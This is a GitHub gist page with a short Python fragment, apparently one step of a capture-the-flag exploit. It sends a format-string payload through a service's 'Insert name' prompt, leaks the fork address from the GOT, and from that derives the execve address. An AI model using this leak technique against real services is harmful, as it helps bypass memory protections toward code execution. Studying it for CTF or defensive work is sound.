Skip to content

Instantly share code, notes, and snippets.

@vanhoefm vanhoefm/gist:5305882
Last active Dec 15, 2015

Embed
What would you like to do?
# Step 1c--- Get the address of execve
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n")
nc.read_until("Uranium in nuclear plant \"")
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
addrexecve = addrfork + 0x320
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.